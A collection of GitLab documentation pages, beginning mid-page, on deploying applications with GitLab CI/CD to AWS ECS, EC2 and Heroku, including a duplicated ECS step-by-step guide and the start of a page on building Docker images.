The targeted task definition is updated with the location of the new Docker image, and a new revision is created in ECS as a result. Finally, your AWS ECS service is updated with the new revision of the task definition, making the cluster pull the newest version of your application.

{{< alert type="note" >}}

ECS deploy jobs wait for the rollout to complete before exiting. To disable this behavior, set `CI_AWS_ECS_WAIT_FOR_ROLLOUT_COMPLETE_DISABLED` to a non-empty value.

{{< /alert >}}

{{< alert type="warning" >}}

The [`AWS/Deploy-ECS.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/AWS/Deploy-ECS.gitlab-ci.yml) template includes two templates: [`Jobs/Build.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Build.gitlab-ci.yml) and [`Jobs/Deploy/ECS.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Deploy/ECS.gitlab-ci.yml). Do not include these templates on their own. Only include the `AWS/Deploy-ECS.gitlab-ci.yml` template. These other templates are designed to be used only with the main template. They may move or change unexpectedly. Also, the job names in these templates may change. Do not override these job names in your own pipeline, because the override stops working when the name changes.

{{< /alert >}}

## Deploy your application to EC2

GitLab provides a template, called `AWS/CF-Provision-and-Deploy-EC2`, to assist you in deploying to Amazon EC2. When you configure related JSON objects and use the template, the pipeline:

1. **Creates the stack**: Your infrastructure is provisioned by using the [AWS CloudFormation](https://aws.amazon.com/cloudformation/) API.
1. **Pushes to an S3 bucket**: When your build runs, it creates an artifact. The artifact is pushed to an [AWS S3](https://aws.amazon.com/s3/) bucket.
1.
**Deploys to EC2**: The content is deployed on an [AWS EC2](https://aws.amazon.com/ec2/) instance, as shown in this diagram: ![Shows the CF-Provision-and-Deploy-EC2 pipeline, including the steps of provisioning infrastructure, pushing artifacts to S3, and deploying to EC2.](img/cf_ec2_diagram_v13_5.png) ### Configure the template and JSON To deploy to EC2, complete the following steps. 1. Create JSON for your stack. Use the [AWS template](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-anatomy.html). 1. Create JSON to push to S3. Include the following details. ```json { "applicationName": "string", "source": "string", "s3Location": "s3://your/bucket/project_built_file...]" } ``` The `source` is the location where a `build` job built your application. The build is saved to [`artifacts:paths`](../yaml/_index.md#artifactspaths). 1. Create JSON to deploy to EC2. Use the [AWS template](https://docs.aws.amazon.com/codedeploy/latest/APIReference/API_CreateDeployment.html). 1. Make the JSON objects accessible to your pipeline: - If you want these JSON objects saved in your repository, save the objects as three separate files. In your `.gitlab-ci.yml` file, add [CI/CD variables](../variables/_index.md) that point to the file paths relative to the project root. For example, if your JSON files are in a `<project_root>/aws` folder: ```yaml variables: CI_AWS_CF_CREATE_STACK_FILE: 'aws/cf_create_stack.json' CI_AWS_S3_PUSH_FILE: 'aws/s3_push.json' CI_AWS_EC2_DEPLOYMENT_FILE: 'aws/create_deployment.json' ``` - If you do not want these JSON objects saved in your repository, add each object as a separate [file type CI/CD variable](../variables/_index.md#use-file-type-cicd-variables) in the project settings. Use the same previous variable names. 1. In your `.gitlab-ci.yml` file, create a CI/CD variable for the name of the stack. For example: ```yaml variables: CI_AWS_CF_STACK_NAME: 'YourStackName' ``` 1. 
In your `.gitlab-ci.yml` file, add the CI template:

   ```yaml
   include:
     - template: AWS/CF-Provision-and-Deploy-EC2.gitlab-ci.yml
   ```

1. Run the pipeline.
   - Your AWS CloudFormation stack is created based on the content of your `CI_AWS_CF_CREATE_STACK_FILE` variable. If your stack already exists, this step is skipped, but the `provision` job it belongs to still runs.
   - Your built application is pushed to your S3 bucket and then deployed to your EC2 instance, based on the related JSON object's content. The deployment job finishes when the deployment to EC2 is done or has failed.

## Troubleshooting

### Error `'ascii' codec can't encode character '\uxxxx'`

This error can occur when the response from the `aws-cli` utility used by the Cloud Deploy images contains a Unicode character. The Cloud Deploy images we provide do not have a defined locale and default to using ASCII. To resolve this error, add the following CI/CD variable:

```yaml
variables:
  LANG: "UTF-8"
```
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Use GitLab CI/CD to deploy to Heroku
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can deploy an application to Heroku by using GitLab CI/CD.

## Prerequisites

- A [Heroku](https://id.heroku.com/login) account. Sign in with an existing Heroku account or create a new one.

## Deploy to Heroku

1. In Heroku:
   1. Create an application and copy the application name.
   1. Browse to **Account Settings** and copy the API key.
1. In your GitLab project, create two [variables](../variables/_index.md):
   - `HEROKU_APP_NAME` for the application name.
   - `HEROKU_PRODUCTION_KEY` for the API key.
1. Edit your `.gitlab-ci.yml` file to add the Heroku deployment command. This example uses the `dpl` gem for Ruby:

   ```yaml
   heroku_deploy:
     stage: production
     script:
       - gem install dpl
       - dpl --provider=heroku --app=$HEROKU_APP_NAME --api-key=$HEROKU_PRODUCTION_KEY
   ```
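The job above assumes a `production` stage exists and that the runner's default image can run Ruby. A fuller sketch of the same pipeline follows; the `stages` list and the `ruby:3.2` image tag are assumptions added for illustration, not part of the original example.

```yaml
stages:
  - production

heroku_deploy:
  stage: production
  image: ruby:3.2  # assumption: any image with Ruby and RubyGems available works
  script:
    - gem install dpl
    - dpl --provider=heroku --app=$HEROKU_APP_NAME --api-key=$HEROKU_PRODUCTION_KEY
  environment: production
```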
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Deploy to Amazon Elastic Container Service
---
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This step-by-step guide helps you deploy a project hosted on GitLab.com to the Amazon [Elastic Container Service (ECS)](https://aws.amazon.com/ecs/). In this guide, you begin by creating an ECS cluster manually using the AWS console. You create and deploy a simple application that you create from a GitLab template. These instructions work for both GitLab.com and GitLab Self-Managed instances. Ensure your own [runners are configured](../../runners/_index.md). ## Prerequisites - An [AWS account](https://repost.aws/knowledge-center/create-and-activate-aws-account). Sign in with an existing AWS account or create a new one. - In this guide, you create an infrastructure in [`us-east-2` region](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html). You can use any region, but do not change it after you begin. ## Create an infrastructure and initial deployment on AWS For deploying an application from GitLab, you must first create an infrastructure and initial deployment on AWS. This includes an [ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html) and related components, such as [ECS task definitions](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html), [ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html), and containerized application image. For the first step here, you create a demo application from a project template. ### Create a new project from a template Use a GitLab project template to get started. As the name suggests, these projects provide a bare-bones application built on some well-known frameworks. 1. In GitLab on the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. 
Select **Create from template**, where you can choose from a Ruby on Rails, Spring, or NodeJS Express project. For this guide, use the Ruby on Rails template.
1. Give your project a name. In this example, it's named `ecs-demo`. Make it public so that you can take advantage of the features available in the [GitLab Ultimate plan](https://about.gitlab.com/pricing/).
1. Select **Create project**.

Now that you created a demo project, you must containerize the application and push it to the container registry.

### Push a containerized application image to GitLab container registry

[ECS](https://aws.amazon.com/ecs/) is a container orchestration service, meaning that you must provide a containerized application image during the infrastructure build. To do so, you can use GitLab [Auto Build](../../../topics/autodevops/stages.md#auto-build) and [Container Registry](../../../user/packages/container_registry/_index.md).

1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project.
1. Select **Set up CI/CD**. It brings you to a `.gitlab-ci.yml` creation form.
1. Copy and paste the following content into the empty `.gitlab-ci.yml`. This defines a pipeline for continuous deployment to ECS.

   ```yaml
   include:
     - template: AWS/Deploy-ECS.gitlab-ci.yml
   ```

1. Select **Commit Changes**. It automatically triggers a new pipeline. In this pipeline, the `build` job containerizes the application and pushes the image to the [GitLab container registry](../../../user/packages/container_registry/_index.md).
1. Visit **Deploy > Container Registry**. Make sure the application image has been pushed.

   ![A containerized application image in the GitLab container registry.](img/registry_v13_10.png)

Now you have a containerized application image that can be pulled from AWS. Next, you define the spec of how this application image is used in AWS.

The `production_ecs` job fails because the ECS cluster is not connected yet. You can fix this later.
### Create an ECS task definition

An [ECS task definition](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html) is a specification of how the application image is started by an [ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html).

1. Go to **ECS > Task Definitions** on the [AWS console](https://aws.amazon.com/).
1. Select **Create new Task Definition**.

   ![Task definitions page with a 'Create new task definition' button.](img/ecs-task-definitions_v13_10.png)

1. Choose **EC2** as the launch type. Select **Next Step**.
1. Set **Task Definition Name** to `ecs_demo`.
1. Set **Task Size > Task memory** and **Task CPU** to `512`.
1. Select **Container Definitions > Add container**. This opens a container registration form.
1. Set **Container name** to `web`.
1. Set **Image** to `registry.gitlab.com/<your-namespace>/ecs-demo/master:latest`. Alternatively, you can copy and paste the image path from the [GitLab container registry page](#push-a-containerized-application-image-to-gitlab-container-registry).

   ![Container name and image fields completed.](img/container-name_v13_10.png)

1. Add a port mapping. Set **Host Port** to `80` and **Container port** to `5000`.

   ![Port mappings fields completed.](img/container-port-mapping_v13_10.png)

1. Select **Create**.

Now you have the initial task definition. Next, you create the actual infrastructure to run the application image.

### Create an ECS cluster

An [ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html) is a virtual group of [ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html). It's also associated with EC2 or Fargate as the computation resource.

1. Go to **ECS > Clusters** on the [AWS console](https://aws.amazon.com/).
1. Select **Create Cluster**.
1. Select **EC2 Linux + Networking** as the cluster template. Select **Next Step**.
1. Set **Cluster Name** to `ecs-demo`.
1.
Choose the default [VPC](https://aws.amazon.com/vpc/?vpc-blogs.sort-by=item.additionalFields.createdDate&vpc-blogs.sort-order=desc) in **Networking**. If there are no existing VPCs, you can leave it as-is to create a new one.
1. Set **Subnets** to all available subnets of the VPC.
1. Select **Create**.
1. Make sure that the ECS cluster has been successfully created.

   ![ECS cluster created successfully with all instances running.](img/ecs-launch-status_v13_10.png)

Now you can register an ECS service to the ECS cluster in the next step.

Note the following:

- Optionally, you can set an SSH key pair in the creation form. This allows you to SSH to the EC2 instance for debugging.
- If you don't choose an existing VPC, it creates a new VPC by default. This could cause an error if it reaches the maximum allowed number of internet gateways on your account.
- The cluster requires an EC2 instance, meaning it costs you [according to the instance type](https://aws.amazon.com/ec2/pricing/on-demand/).

### Create an ECS Service

An [ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html) is a daemon that creates an application container based on the [ECS task definition](#create-an-ecs-task-definition).

1. Go to **ECS > Clusters > ecs-demo > Services** on the [AWS console](https://aws.amazon.com/).
1. Select **Deploy**. This opens a service creation form.
1. Select `EC2` in **Launch Type**.
1. Set **Task definition** to `ecs_demo`. This corresponds to [the task definition you created previously](#create-an-ecs-task-definition).
1. Set **Service name** to `ecs_demo`.
1. Set **Desired tasks** to `1`.

   ![Services page with all inputs completed.](img/service-parameter_v13_10.png)

1. Select **Deploy**.
1. Make sure that the created service is active.

   ![An active service running with tasks.](img/service-running_v13_10.png)

The AWS console UI changes from time to time. If you can't find a relevant component in the instructions, select the closest one.
### View the demo application

Now, the demo application is accessible from the internet.

1. Go to **EC2 > Instances** on the [AWS console](https://aws.amazon.com/).
1. Search by `ECS Instance` to find the corresponding EC2 instance that [the ECS cluster created](#create-an-ecs-cluster).
1. Select the ID of the EC2 instance. This brings you to the instance detail page.
1. Copy **Public IPv4 address** and paste it in the browser. Now you can see the demo application running.

   ![The demo application running in a browser.](img/view-running-app_v13_10.png)

In this guide, HTTPS/SSL is **not** configured. You can access the application through HTTP only (for example, `http://<ec2-ipv4-address>`).

## Set up Continuous Deployment from GitLab

Now that you have an application running on ECS, you can set up continuous deployment from GitLab.

### Create a new IAM user as a deployer

For GitLab to access the ECS cluster, service, and task definition that you previously created, you must create a deployer user on AWS:

1. Go to **IAM > Users** on the [AWS console](https://aws.amazon.com/).
1. Select **Add user**.
1. Set **User name** to `ecs_demo`.
1. Select the **Programmatic access** checkbox. Select **Next: Permissions**.
1. Select `Attach existing policies directly` in **Set permissions**.
1. Select `AmazonECS_FullAccess` from the policy list. Select **Next: Tags** and **Next: Review**.

   ![A selected `AmazonECS_FullAccess` policy.](img/ecs-policy_v13_10.png)

1. Select **Create user**.
1. Take note of the **Access key ID** and **Secret access key** of the created user.

{{< alert type="note" >}}

Do not share the secret access key in a public place. You must save it in a secure place.

{{< /alert >}}

### Set up credentials in GitLab to let pipeline jobs access ECS

You can register the access information in [GitLab CI/CD Variables](../../variables/_index.md). These variables are injected into the pipeline jobs and can access the ECS API.

1.
On the left sidebar, select **Search or go to** and find your `ecs-demo` project.
1. Go to **Settings > CI/CD > Variables**.
1. Select **Add Variable** and set the following key-value pairs.

   | Key | Value | Note |
   |------------------------------|---------------------------------------|------|
   | `AWS_ACCESS_KEY_ID` | `<Access key ID of the deployer>` | For authenticating the `aws` CLI. |
   | `AWS_SECRET_ACCESS_KEY` | `<Secret access key of the deployer>` | For authenticating the `aws` CLI. |
   | `AWS_DEFAULT_REGION` | `us-east-2` | For authenticating the `aws` CLI. |
   | `CI_AWS_ECS_CLUSTER` | `ecs-demo` | The ECS cluster accessed by the `production_ecs` job. |
   | `CI_AWS_ECS_SERVICE` | `ecs_demo` | The ECS service of the cluster, updated by the `production_ecs` job. Ensure that this variable is scoped to the appropriate environment (`production`, `staging`, `review/*`). |
   | `CI_AWS_ECS_TASK_DEFINITION` | `ecs_demo` | The ECS task definition updated by the `production_ecs` job. |

### Make a change to the demo application

Change a file in the project and see if it's reflected in the demo application on ECS:

1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project.
1. Open the `app/views/welcome/index.html.erb` file.
1. Select **Edit**.
1. Change the text to `You're on ECS!`.
1. Select **Commit Changes**. This automatically triggers a new pipeline. Wait until it finishes.
1. [Access the running application on the ECS cluster](#view-the-demo-application). You should see this:

   ![Application running on ECS with a confirmation message.](img/view-running-app-2_v13_10.png)

Congratulations! You successfully set up continuous deployment to ECS.

{{< alert type="note" >}}

ECS deploy jobs wait for the rollout to complete before exiting. To disable this behavior, set `CI_AWS_ECS_WAIT_FOR_ROLLOUT_COMPLETE_DISABLED` to a non-empty value.

{{< /alert >}}

## Set up review apps

To use review apps with ECS:

1. Set up a new [service](#create-an-ecs-service).
1.
Use the `CI_AWS_ECS_SERVICE` variable to set the name. 1. Set the environment scope to `review/*`. Only one Review App at a time can be deployed because this service is shared by all review apps. ## Set up Security Testing ### Configure SAST To use [SAST](../../../user/application_security/sast/_index.md) with ECS, add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` For more details and configuration options, see the [SAST documentation](../../../user/application_security/sast/_index.md#configuration). ### Configure DAST To use [DAST](../../../user/application_security/dast/_index.md) on non-default branches, [set up review apps](#set-up-review-apps) and add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Security/DAST.gitlab-ci.yml ``` To use DAST on the default branch: 1. Set up a new [service](#create-an-ecs-service). This service will be used to deploy a temporary DAST environment. 1. Use the `CI_AWS_ECS_SERVICE` variable to set the name. 1. Set the scope to the `dast-default` environment. 1. Add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Security/DAST.gitlab-ci.yml - template: Jobs/DAST-Default-Branch-Deploy.gitlab-ci.yml ``` For more details and configuration options, see the [DAST documentation](../../../user/application_security/dast/_index.md). ## Further reading - If you're interested in more of the continuous deployments to clouds, see [cloud deployments](../_index.md). - If you want to quickly set up DevSecOps in your project, see [Auto DevOps](../../../topics/autodevops/_index.md). - If you want to quickly set up the production-grade environment, see [the 5 Minute Production App](https://gitlab.com/gitlab-org/5-minute-production-app/deploy-template/-/blob/master/README.md).
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Deploy to Amazon Elastic Container Service
breadcrumbs:
  - doc
  - ci
  - cloud_deployment
  - ecs
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

This step-by-step guide helps you deploy a project hosted on GitLab.com to the
Amazon [Elastic Container Service (ECS)](https://aws.amazon.com/ecs/).

In this guide, you begin by creating an ECS cluster manually using the AWS console.
You create and deploy a simple application that you create from a GitLab template.

These instructions work for both GitLab.com and GitLab Self-Managed instances.
Ensure your own [runners are configured](../../runners/_index.md).

## Prerequisites

- An [AWS account](https://repost.aws/knowledge-center/create-and-activate-aws-account).
  Sign in with an existing AWS account or create a new one.
- In this guide, you create an infrastructure in the
  [`us-east-2` region](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html).
  You can use any region, but do not change it after you begin.

## Create an infrastructure and initial deployment on AWS

For deploying an application from GitLab, you must first create an infrastructure and initial
deployment on AWS. This includes an
[ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html)
and related components, such as
[ECS task definitions](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html),
[ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html),
and a containerized application image.

For the first step here, you create a demo application from a project template.
### Create a new project from a template

Use a GitLab project template to get started. As the name suggests, these projects provide a
bare-bones application built on some well-known frameworks.

1. In GitLab, on the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and
   **New project/repository**.
1. Select **Create from template**, where you can choose from a Ruby on Rails, Spring, or
   NodeJS Express project. For this guide, use the Ruby on Rails template.
1. Give your project a name. In this example, it's named `ecs-demo`. Make it public so that
   you can take advantage of the features available in the
   [GitLab Ultimate plan](https://about.gitlab.com/pricing/).
1. Select **Create project**.

Now that you created a demo project, you must containerize the application and push it to the
container registry.

### Push a containerized application image to GitLab container registry

[ECS](https://aws.amazon.com/ecs/) is a container orchestration service, meaning that you must
provide a containerized application image during the infrastructure build. To do so, you can use
GitLab [Auto Build](../../../topics/autodevops/stages.md#auto-build) and
[Container Registry](../../../user/packages/container_registry/_index.md).

1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project.
1. Select **Set up CI/CD**. It brings you to a `.gitlab-ci.yml` creation form.
1. Copy and paste the following content into the empty `.gitlab-ci.yml`. This defines a pipeline
   for continuous deployment to ECS.

   ```yaml
   include:
     - template: AWS/Deploy-ECS.gitlab-ci.yml
   ```

1. Select **Commit Changes**. It automatically triggers a new pipeline. In this pipeline, the
   `build` job containerizes the application and pushes the image to
   [GitLab container registry](../../../user/packages/container_registry/_index.md).
1. Visit **Deploy > Container Registry**. Make sure the application image has been pushed.
   ![A containerized application image in the GitLab container registry.](img/registry_v13_10.png)

Now you have a containerized application image that can be pulled from AWS. Next, you define the
spec of how this application image is used in AWS.

The `production_ecs` job fails because the ECS cluster is not connected yet. You can fix this later.

### Create an ECS task definition

An [ECS task definition](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html)
is a specification of how the application image is started by an
[ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html).

1. Go to **ECS > Task Definitions** on the [AWS console](https://aws.amazon.com/).
1. Select **Create new Task Definition**.

   ![Task definitions page with a 'Create new task definition' button.](img/ecs-task-definitions_v13_10.png)

1. Choose **EC2** as the launch type. Select **Next Step**.
1. Set `ecs_demo` to **Task Definition Name**.
1. Set `512` to **Task Size > Task memory** and **Task CPU**.
1. Select **Container Definitions > Add container**. This opens a container registration form.
1. Set `web` to **Container name**.
1. Set `registry.gitlab.com/<your-namespace>/ecs-demo/master:latest` to **Image**.
   Alternatively, you can copy and paste the image path from the
   [GitLab container registry page](#push-a-containerized-application-image-to-gitlab-container-registry).

   ![Container name and image fields completed.](img/container-name_v13_10.png)

1. Add a port mapping. Set `80` to **Host Port** and `5000` to **Container port**.

   ![Port mappings fields completed.](img/container-port-mapping_v13_10.png)

1. Select **Create**.

Now you have the initial task definition. Next, you create an actual infrastructure to run the
application image.
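The console steps above produce a task definition that you could also express as JSON and register
with the AWS CLI instead of clicking through the console. The following is an illustrative sketch,
not part of this guide: the field values mirror the settings above, but verify the file against
your account and the ECS task definition reference before using it.

```json
{
  "family": "ecs_demo",
  "requiresCompatibilities": ["EC2"],
  "containerDefinitions": [
    {
      "name": "web",
      "image": "registry.gitlab.com/<your-namespace>/ecs-demo/master:latest",
      "memory": 512,
      "cpu": 512,
      "essential": true,
      "portMappings": [
        {
          "hostPort": 80,
          "containerPort": 5000,
          "protocol": "tcp"
        }
      ]
    }
  ]
}
```

Saved as `task-definition.json` (a hypothetical filename), it could be registered with
`aws ecs register-task-definition --cli-input-json file://task-definition.json`.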
### Create an ECS cluster

An [ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html)
is a virtual group of [ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html).
It's also associated with EC2 or Fargate as the computation resource.

1. Go to **ECS > Clusters** on the [AWS console](https://aws.amazon.com/).
1. Select **Create Cluster**.
1. Select **EC2 Linux + Networking** as the cluster template. Select **Next Step**.
1. Set `ecs-demo` to **Cluster Name**.
1. Choose the default [VPC](https://aws.amazon.com/vpc/?vpc-blogs.sort-by=item.additionalFields.createdDate&vpc-blogs.sort-order=desc)
   in **Networking**. If there are no existing VPCs, you can leave it as-is to create a new one.
1. Set all available subnets of the VPC to **Subnets**.
1. Select **Create**.
1. Make sure that the ECS cluster has been successfully created.

   ![ECS cluster created successfully with all instances running.](img/ecs-launch-status_v13_10.png)

Now you can register an ECS service to the ECS cluster in the next step.

Note the following:

- Optionally, you can set an SSH key pair in the creation form. This allows you to SSH to the EC2
  instance for debugging.
- If you don't choose an existing VPC, it creates a new VPC by default. This could cause an error
  if it reaches the maximum allowed number of internet gateways on your account.
- The cluster requires an EC2 instance, meaning it costs you
  [according to the instance-type](https://aws.amazon.com/ec2/pricing/on-demand/).

### Create an ECS Service

An [ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html)
is a daemon that creates an application container based on the
[ECS task definition](#create-an-ecs-task-definition).

1. Go to **ECS > Clusters > ecs-demo > Services** on the [AWS console](https://aws.amazon.com/).
1. Select **Deploy**. This opens a service creation form.
1. Select `EC2` in **Launch Type**.
1. Set `ecs_demo` to **Task definition**.
   This corresponds to [the task definition you created previously](#create-an-ecs-task-definition).
1. Set `ecs_demo` to **Service name**.
1. Set `1` to **Desired tasks**.

   ![Services page with all inputs completed.](img/service-parameter_v13_10.png)

1. Select **Deploy**.
1. Make sure that the created service is active.

   ![An active service running with tasks.](img/service-running_v13_10.png)

The AWS console UI changes from time to time. If you can't find a relevant component in the
instructions, select the closest one.

### View the demo application

Now, the demo application is accessible from the internet.

1. Go to **EC2 > Instances** on the [AWS console](https://aws.amazon.com/).
1. Search by `ECS Instance` to find the corresponding EC2 instance that
   [the ECS cluster created](#create-an-ecs-cluster).
1. Select the ID of the EC2 instance. This brings you to the instance detail page.
1. Copy **Public IPv4 address** and paste it in the browser. Now you can see the demo application
   running.

   ![The demo application running in a browser.](img/view-running-app_v13_10.png)

In this guide, HTTPS/SSL is **not** configured. You can access the application through HTTP only
(for example, `http://<ec2-ipv4-address>`).

## Set up Continuous Deployment from GitLab

Now that you have an application running on ECS, you can set up continuous deployment from GitLab.

### Create a new IAM user as a deployer

For GitLab to access the ECS cluster, service, and task definition that you previously created,
you must create a deployer user on AWS:

1. Go to **IAM > Users** on the [AWS console](https://aws.amazon.com/).
1. Select **Add user**.
1. Set `ecs_demo` to **User name**.
1. Select the **Programmatic access** checkbox. Select **Next: Permissions**.
1. Select `Attach existing policies directly` in **Set permissions**.
1. Select `AmazonECS_FullAccess` from the policy list. Select **Next: Tags** and **Next: Review**.

   ![A selected `AmazonECS_FullAccess` policy.](img/ecs-policy_v13_10.png)
1. Select **Create user**.
1. Take note of the **Access key ID** and **Secret access key** of the created user.

{{< alert type="note" >}}

Do not share the secret access key in a public place. You must save it in a secure place.

{{< /alert >}}

### Set up credentials in GitLab to let pipeline jobs access ECS

You can register the access information in [GitLab CI/CD Variables](../../variables/_index.md).
These variables are injected into the pipeline jobs and can access the ECS API.

1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project.
1. Go to **Settings > CI/CD > Variables**.
1. Select **Add Variable** and set the following key-value pairs.

   | Key | Value | Note |
   |------------------------------|---------------------------------------|------|
   | `AWS_ACCESS_KEY_ID` | `<Access key ID of the deployer>` | For authenticating the `aws` CLI. |
   | `AWS_SECRET_ACCESS_KEY` | `<Secret access key of the deployer>` | For authenticating the `aws` CLI. |
   | `AWS_DEFAULT_REGION` | `us-east-2` | For authenticating the `aws` CLI. |
   | `CI_AWS_ECS_CLUSTER` | `ecs-demo` | The ECS cluster accessed by the `production_ecs` job. |
   | `CI_AWS_ECS_SERVICE` | `ecs_demo` | The ECS service of the cluster updated by the `production_ecs` job. Ensure that this variable is scoped to the appropriate environment (`production`, `staging`, `review/*`). |
   | `CI_AWS_ECS_TASK_DEFINITION` | `ecs_demo` | The ECS task definition updated by the `production_ecs` job. |

### Make a change to the demo application

Change a file in the project and see if it's reflected in the demo application on ECS:

1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project.
1. Open the `app/views/welcome/index.html.erb` file.
1. Select **Edit**.
1. Change the text to `You're on ECS!`.
1. Select **Commit Changes**. This automatically triggers a new pipeline. Wait until it finishes.
1. [Access the running application on the ECS cluster](#view-the-demo-application).
   You should see this:

   ![Application running on ECS with a confirmation message.](img/view-running-app-2_v13_10.png)

Congratulations! You successfully set up continuous deployment to ECS.

{{< alert type="note" >}}

ECS deploy jobs wait for the rollout to complete before exiting. To disable this behavior, set
`CI_AWS_ECS_WAIT_FOR_ROLLOUT_COMPLETE_DISABLED` to a non-empty value.

{{< /alert >}}

## Set up review apps

To use review apps with ECS:

1. Set up a new [service](#create-an-ecs-service).
1. Use the `CI_AWS_ECS_SERVICE` variable to set the name.
1. Set the environment scope to `review/*`.

Only one review app at a time can be deployed because this service is shared by all review apps.

## Set up Security Testing

### Configure SAST

To use [SAST](../../../user/application_security/sast/_index.md) with ECS, add the following to
your `.gitlab-ci.yml` file:

```yaml
include:
  - template: Jobs/SAST.gitlab-ci.yml
```

For more details and configuration options, see the
[SAST documentation](../../../user/application_security/sast/_index.md#configuration).

### Configure DAST

To use [DAST](../../../user/application_security/dast/_index.md) on non-default branches,
[set up review apps](#set-up-review-apps) and add the following to your `.gitlab-ci.yml` file:

```yaml
include:
  - template: Security/DAST.gitlab-ci.yml
```

To use DAST on the default branch:

1. Set up a new [service](#create-an-ecs-service). This service is used to deploy a temporary
   DAST environment.
1. Use the `CI_AWS_ECS_SERVICE` variable to set the name.
1. Set the scope to the `dast-default` environment.
1. Add the following to your `.gitlab-ci.yml` file:

   ```yaml
   include:
     - template: Security/DAST.gitlab-ci.yml
     - template: Jobs/DAST-Default-Branch-Deploy.gitlab-ci.yml
   ```

For more details and configuration options, see the
[DAST documentation](../../../user/application_security/dast/_index.md).
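If you enable the deployment and both security scans described in this guide, the resulting
`.gitlab-ci.yml` can stay small because everything comes from templates. As a rough sketch,
assuming you want all three (drop any template you don't use):

```yaml
include:
  # Continuous deployment to ECS, set up earlier in this guide
  - template: AWS/Deploy-ECS.gitlab-ci.yml
  # Static application security testing
  - template: Jobs/SAST.gitlab-ci.yml
  # Dynamic application security testing on non-default branches
  - template: Security/DAST.gitlab-ci.yml
```

Each template appears individually earlier in this guide; combining them in one file is an
assumption about your setup, not a requirement.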
## Further reading

- If you're interested in more continuous deployments to clouds, see
  [cloud deployments](../_index.md).
- If you want to quickly set up DevSecOps in your project, see
  [Auto DevOps](../../../topics/autodevops/_index.md).
- If you want to quickly set up a production-grade environment, see
  [the 5 Minute Production App](https://gitlab.com/gitlab-org/5-minute-production-app/deploy-template/-/blob/master/README.md).
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Use Docker to build Docker images
breadcrumbs:
  - doc
  - ci
  - docker
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

You can use GitLab CI/CD with Docker to create Docker images. For example, you can create a
Docker image of your application, test it, and push it to a container registry.

To run Docker commands in your CI/CD jobs, you must configure GitLab Runner to support `docker`
commands. This method requires `privileged` mode.

If you want to build Docker images without enabling `privileged` mode on the runner, you can use
a [Docker alternative](#docker-alternatives).

## Enable Docker commands in your CI/CD jobs

To enable Docker commands for your CI/CD jobs, you can use:

- [The shell executor](#use-the-shell-executor)
- [Docker-in-Docker](#use-docker-in-docker)
- [Docker socket binding](#use-docker-socket-binding)
- [Docker pipe binding](#use-docker-pipe-binding)

### Use the shell executor

To include Docker commands in your CI/CD jobs, you can configure your runner to use the `shell`
executor. In this configuration, the `gitlab-runner` user runs the Docker commands, but needs
permission to do so.

1. [Install](https://gitlab.com/gitlab-org/gitlab-runner/#installation) GitLab Runner.
1. [Register](https://docs.gitlab.com/runner/register/) a runner. Select the `shell` executor.
   For example:

   ```shell
   sudo gitlab-runner register -n \
     --url "https://gitlab.com/" \
     --registration-token REGISTRATION_TOKEN \
     --executor shell \
     --description "My Runner"
   ```

1. On the server where GitLab Runner is installed, install Docker Engine.
   View a list of [supported platforms](https://docs.docker.com/engine/install/).

